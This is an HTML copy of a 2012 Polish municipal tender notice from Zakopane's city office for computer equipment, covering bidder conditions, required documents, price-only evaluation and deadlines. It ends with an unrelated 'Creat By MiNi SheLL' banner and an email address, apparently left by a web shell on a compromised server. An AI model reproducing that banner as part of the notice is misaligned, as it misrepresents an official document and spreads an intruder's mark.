Do zestawu Wykonawca dołączy wszystkie potrzebne kable przyłączeniowe, nośniki ze sterownikami i oprogramowaniem, dokumentację techniczną oraz gwarancję.                                                                
  Zamawiający informuje, że ilekroć przedmiot zamówienia określony w siwz i w   załącznikach  do specyfikacji istotnych warunków zamówienia opisany jest przez wskazanie znaku towarowego, patentu lub pochodzenia dopuszcza się rozwiązania równoważne, z zastrzeżeniem, iż proponowane rozwiązania (materiały, urządzenia) będą posiadały parametry techniczne nie gorsze niż wymagane przez zamawiającego , posiadały wymagane  atesty , spełniały normy. Wykazanie równoważności zaoferowanego przedmiotu spoczywa na Wykonawcy, który jest obowiązany wykazać, że oferowane przez niego   dostawy  ( w tym m.in. proponowane materiały, urządzenia) spełniają wymagania określone przez zamawiającego. siwz W takim wypadku należy załączyć do oferty  opis  tych materiałów i urządzeń  aby zamawiający mógł  sprawdzić czy  odpowiadają one   wymaganiom postawionym w siwz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.21.33.00-8, 32.32.46.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu
  
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu


Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu


Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty jakie należy załączyć do oferty: 
 
Dokładny opis ( marka, producent , specyfikacje techniczna itp.) proponowanego sprzętu - należy wypełnić załącznik   nr 1 do druku oferty stanowiącego załącznik nr 2  siwz.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne postępowania poniżej  wartości  art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Referat Gospodarczy Urząd Miasta Zakopane ul. Kościuszki 13 34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2012 godzina 12:00, miejsce: Biuro d.s. zamówień publicznych (pok.8 )Urząd Miasta Zakopane ul. Kościuszki 13 34-500 Zakopane..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com